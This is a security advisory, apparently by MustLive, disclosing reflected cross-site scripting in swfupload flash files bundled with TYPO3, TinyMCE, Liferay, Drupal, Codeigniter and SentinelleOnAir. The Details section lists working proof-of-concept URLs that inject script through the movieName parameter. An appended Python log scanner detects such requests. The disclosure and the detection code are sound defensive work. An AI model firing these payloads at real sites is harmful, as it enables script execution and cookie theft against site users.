TYPO3 CMS, TinyMCE, Liferay Portal, Drupal swfupload XSS

2012-11-25 / 2013-07-20
Credit: MustLive
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

I want to draw your attention to an XSS vulnerability in other web applications with swfupload. This is the final advisory concerning different versions of this flash application.

Earlier I wrote about swfupload in Archiv plugin for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS, AionWeb, Liferay Portal, SurgeMail and symfony, and noted that this hole is present in many other web applications. In previous letters I wrote about web applications with swfupload_f8.swf, swfupload_f9.swf and swfupload.swf (which are for Flash Player 8, 9 and 10). Now I'll write about web applications with swfupload_f10.swf and swfupload_f11.swf (which are for Flash Player 10 and 11).

Here is information about SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition, earlier called Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter and SentinelleOnAir - among the multiple web applications which are bundled with swfupload_f10.swf or swfupload_f11.swf.

-------------------------
Affected products:
-------------------------

Potentially all versions of SwfUploadPanel for TYPO3 CMS, Archiv plugin for TinyMCE, Liferay Portal (Community Edition, earlier called Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload for Codeigniter and SentinelleOnAir are vulnerable. There is no information that they have fixed this vulnerability in their software (while this vulnerability was fixed in WordPress 3.3.2 on 20.04.2012). The developers of WordPress released a new version of the flash file (as did the developers of XenForo), which could be used by all web developers who were using swfupload.
----------
Details:
----------

XSS (WASC-08):

SwfUploadPanel for TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin for TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin for TinyMCE also contains swfupload_f10.swf, besides the swfupload_f9.swf and swfupload_f8.swf described earlier.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Liferay Portal also contains swfupload_f10.swf, besides the swfupload_f9.swf and swfupload_f8.swf described earlier.

Swfupload for Drupal:

As can be seen from the project http://code.google.com/p/drupal-swfupload/ there is a version of Swfupload for Drupal. But this project itself contains no files. They are in the project Respectiva (http://code.google.com/p/respectiva/), which is Drupal with Swfupload.

http://site/js/libs/swfupload_f10.swf

SWFUpload for Codeigniter:

http://site/www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/www/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/www/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

The above concerns swfupload_f10.swf.
As for swfupload_f11.swf, in Google's index there is only one project, SentinelleOnAir, which contains swfupload_f11.swf.

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload11.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
http://site/upload/swfupload/swfupload9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

References:

http://websecurity.com.ua
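
A defender-side check for the request pattern described in this advisory, as an added example that is not part of the original advisory: it scans access-log lines for requests to a swfupload flash file whose movieName parameter is not a plain identifier. The combined log format, the sample lines and the allowed character set for movieName are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# File names listed in the advisory: swfupload.swf, swfupload_f8..f11.swf, swfupload9..11.swf
SWF_NAME = re.compile(r"/swfupload(?:_f)?\d*\.swf$", re.IGNORECASE)
# Assumption: a legitimate movieName is a plain identifier such as SWFUpload_0
SAFE_MOVIE_NAME = re.compile(r"[A-Za-z0-9_]*")
# Request line inside a combined-format access log entry (assumed log format)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not taken from any real server)
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Jul/2013:10:00:01 +0000] "GET /html/js/misc/swfupload/'
    'swfupload_f10.swf?movieName=SWFUpload_0 HTTP/1.1" 200 12345',
    '192.0.2.11 - - [20/Jul/2013:10:00:05 +0000] "GET /upload/swfupload/'
    'swfupload11.swf?movieName=%22%5D%29%3B HTTP/1.1" 200 12345',
    '192.0.2.12 - - [20/Jul/2013:10:00:09 +0000] "GET /index.php?movieName=%22%5D '
    'HTTP/1.1" 200 512',
]

def suspicious_swfupload_requests(log_lines):
    """Return (path, decoded movieName) for swfupload requests worth reviewing."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        try:
            url = urlsplit(m.group(1))
        except ValueError:  # malformed request target; nothing to parse
            continue
        if not SWF_NAME.search(url.path):
            continue  # not one of the bundled flash files
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            # parse_qsl percent-decodes, so encoded quotes and brackets are seen as-is
            if key == "movieName" and not SAFE_MOVIE_NAME.fullmatch(value):
                hits.append((url.path, value))
    return hits

if __name__ == "__main__":
    for path, value in suspicious_swfupload_requests(SAMPLE_LOG):
        print(f"review: {path} movieName={value!r}")
```

The same SWF_NAME pattern can be run over a webroot listing to inventory bundled copies that should be replaced with the fixed flash file the advisory mentions.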



Copyright 2024, cxsecurity.com

 
